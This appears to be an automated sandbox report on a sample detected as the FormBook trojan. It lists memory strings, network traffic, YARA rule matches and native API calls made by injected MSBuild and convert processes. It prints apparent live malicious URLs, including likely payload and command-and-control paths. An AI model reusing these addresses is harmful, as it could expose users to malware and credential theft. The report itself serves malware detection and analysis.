Source: 9B1ZyhsFUq.exe, 00000000.00000002.1293384927.0000000003170000.00000004.00000800.00020000.00000000.sdmp, 9B1ZyhsFUq.exe, 00000000.00000002.1293384927.00000000030E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2514005145.0000000004B9D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.theridleysuk.co.uk
Source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2514005145.0000000004B9D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.theridleysuk.co.uk/frbh/
Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: convert.exe, 0000000B.00000002.2512955277.00000000045BA000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.0000000002F7A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 9B1ZyhsFUq.exe	String found in binary or memory: https://github.com/HerpDerpinstine/bHapticsLib
Source: 9B1ZyhsFUq.exe	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Footer.cli
Source: 9B1ZyhsFUq.exe	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Oszina.cli
Source: convert.exe, 0000000B.00000002.2508578824.00000000032F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: convert.exe, 0000000B.00000002.2508578824.00000000032F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: convert.exe, 0000000B.00000002.2508578824.00000000032F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: convert.exe, 0000000B.00000002.2508578824.00000000032F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033f
Source: convert.exe, 0000000B.00000002.2508578824.00000000032F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: convert.exe, 0000000B.00000002.2508578824.00000000032F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: convert.exe, 0000000B.00000003.1901451391.0000000007EA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 173.222.162.55:443 -> 192.168.2.10:49711 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2510828363.0000000003490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2511150880.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2514005145.0000000004B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1719734977.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1719850737.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2510828363.0000000003490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2511150880.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2514005145.0000000004B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1719734977.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1719850737.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0042B253 NtClose,	8_2_0042B253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C35C0 NtCreateMutant,LdrInitializeThunk,	8_2_010C35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2B60 NtClose,LdrInitializeThunk,	8_2_010C2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_010C2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_010C2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C3010 NtOpenDirectoryObject,	8_2_010C3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C3090 NtSetValueKey,	8_2_010C3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C4340 NtSetContextThread,	8_2_010C4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C4650 NtSuspendThread,	8_2_010C4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C39B0 NtGetContextThread,	8_2_010C39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2B80 NtQueryInformationFile,	8_2_010C2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2BA0 NtEnumerateValueKey,	8_2_010C2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2BE0 NtQueryValueKey,	8_2_010C2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2BF0 NtAllocateVirtualMemory,	8_2_010C2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2AB0 NtWaitForSingleObject,	8_2_010C2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2AD0 NtReadFile,	8_2_010C2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2AF0 NtWriteFile,	8_2_010C2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2D00 NtSetInformationFile,	8_2_010C2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C3D10 NtOpenProcessToken,	8_2_010C3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2D10 NtMapViewOfSection,	8_2_010C2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2D30 NtUnmapViewOfSection,	8_2_010C2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C3D70 NtOpenThread,	8_2_010C3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2DB0 NtEnumerateKey,	8_2_010C2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2DD0 NtDelayExecution,	8_2_010C2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2C00 NtQueryInformationProcess,	8_2_010C2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2C60 NtCreateKey,	8_2_010C2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2CA0 NtQueryInformationToken,	8_2_010C2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2CC0 NtQueryVirtualMemory,	8_2_010C2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2CF0 NtOpenProcess,	8_2_010C2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2F30 NtCreateSection,	8_2_010C2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2F60 NtCreateProcessEx,	8_2_010C2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2F90 NtProtectVirtualMemory,	8_2_010C2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2FA0 NtQuerySection,	8_2_010C2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2FB0 NtResumeThread,	8_2_010C2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2FE0 NtCreateFile,	8_2_010C2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2E30 NtWriteVirtualMemory,	8_2_010C2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2E80 NtReadVirtualMemory,	8_2_010C2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2EA0 NtAdjustPrivilegesToken,	8_2_010C2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2EE0 NtQueueApcThread,	8_2_010C2EE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03764340 NtSetContextThread,LdrInitializeThunk,	11_2_03764340
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03764650 NtSuspendThread,LdrInitializeThunk,	11_2_03764650
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037635C0 NtCreateMutant,LdrInitializeThunk,	11_2_037635C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762B60 NtClose,LdrInitializeThunk,	11_2_03762B60
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_03762BF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762BE0 NtQueryValueKey,LdrInitializeThunk,	11_2_03762BE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762BA0 NtEnumerateValueKey,LdrInitializeThunk,	11_2_03762BA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762AF0 NtWriteFile,LdrInitializeThunk,	11_2_03762AF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762AD0 NtReadFile,LdrInitializeThunk,	11_2_03762AD0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037639B0 NtGetContextThread,LdrInitializeThunk,	11_2_037639B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762F30 NtCreateSection,LdrInitializeThunk,	11_2_03762F30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762FE0 NtCreateFile,LdrInitializeThunk,	11_2_03762FE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762FB0 NtResumeThread,LdrInitializeThunk,	11_2_03762FB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762EE0 NtQueueApcThread,LdrInitializeThunk,	11_2_03762EE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762E80 NtReadVirtualMemory,LdrInitializeThunk,	11_2_03762E80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762D30 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_03762D30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762D10 NtMapViewOfSection,LdrInitializeThunk,	11_2_03762D10
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762DF0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_03762DF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762DD0 NtDelayExecution,LdrInitializeThunk,	11_2_03762DD0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762C70 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_03762C70
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762C60 NtCreateKey,LdrInitializeThunk,	11_2_03762C60
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762CA0 NtQueryInformationToken,LdrInitializeThunk,	11_2_03762CA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03763010 NtOpenDirectoryObject,	11_2_03763010
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03763090 NtSetValueKey,	11_2_03763090
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762B80 NtQueryInformationFile,	11_2_03762B80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762AB0 NtWaitForSingleObject,	11_2_03762AB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762F60 NtCreateProcessEx,	11_2_03762F60
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762FA0 NtQuerySection,	11_2_03762FA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762F90 NtProtectVirtualMemory,	11_2_03762F90
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762E30 NtWriteVirtualMemory,	11_2_03762E30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762EA0 NtAdjustPrivilegesToken,	11_2_03762EA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03763D70 NtOpenThread,	11_2_03763D70
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03763D10 NtOpenProcessToken,	11_2_03763D10
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762D00 NtSetInformationFile,	11_2_03762D00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762DB0 NtEnumerateKey,	11_2_03762DB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762C00 NtQueryInformationProcess,	11_2_03762C00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762CF0 NtOpenProcess,	11_2_03762CF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762CC0 NtQueryVirtualMemory,	11_2_03762CC0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03027B50 NtReadFile,	11_2_03027B50
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_030279F0 NtCreateFile,	11_2_030279F0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03027E40 NtAllocateVirtualMemory,	11_2_03027E40
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03027C40 NtDeleteFile,	11_2_03027C40
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03027CE0 NtClose,	11_2_03027CE0

Detected potential crypto function

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Code function: 0_2_00007FF7C1930E88	0_2_00007FF7C1930E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00401000	8_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00402820	8_2_00402820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00410083	8_2_00410083
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040E103	8_2_0040E103
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00401190	8_2_00401190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00403300	8_2_00403300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004025C0	8_2_004025C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040FE63	8_2_0040FE63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0042D693	8_2_0042D693
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0041672E	8_2_0041672E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00416733	8_2_00416733
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01080100	8_2_01080100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112A118	8_2_0112A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01118158	8_2_01118158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C516C	8_2_010C516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0115B16B	8_2_0115B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109B1B0	8_2_0109B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011501AA	8_2_011501AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011481CC	8_2_011481CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0113F0CC	8_2_0113F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114F0E0	8_2_0114F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011470E9	8_2_011470E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114132D	8_2_0114132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114A352	8_2_0114A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107D34C	8_2_0107D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010D739A	8_2_010D739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011503E6	8_2_011503E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109E3F0	8_2_0109E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01130274	8_2_01130274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010952A0	8_2_010952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AB2C0	8_2_010AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011312ED	8_2_011312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01090535	8_2_01090535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01147571	8_2_01147571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01150591	8_2_01150591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112D5B0	8_2_0112D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114F43F	8_2_0114F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01142446	8_2_01142446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01081460	8_2_01081460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0113E4F6	8_2_0113E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B4750	8_2_010B4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01090770	8_2_01090770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114F7B0	8_2_0114F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108C7C0	8_2_0108C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010817EC	8_2_010817EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011416CC	8_2_011416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AC6E0	8_2_010AC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01099950	8_2_01099950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AB950	8_2_010AB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A6962	8_2_010A6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010929A0	8_2_010929A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0115A9A6	8_2_0115A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010FD800	8_2_010FD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109A840	8_2_0109A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010768B8	8_2_010768B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010938E0	8_2_010938E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BE8F0	8_2_010BE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114FB76	8_2_0114FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AFB80	8_2_010AFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01146BD7	8_2_01146BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01105BF0	8_2_01105BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010CDBF9	8_2_010CDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01147A46	8_2_01147A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114FA49	8_2_0114FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01103A6C	8_2_01103A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108EA80	8_2_0108EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010D5AA0	8_2_010D5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112DAAC	8_2_0112DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0113DAC6	8_2_0113DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109AD00	8_2_0109AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01093D40	8_2_01093D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01141D5A	8_2_01141D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01147D73	8_2_01147D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A8DBF	8_2_010A8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AFDC0	8_2_010AFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108ADE0	8_2_0108ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01090C00	8_2_01090C00
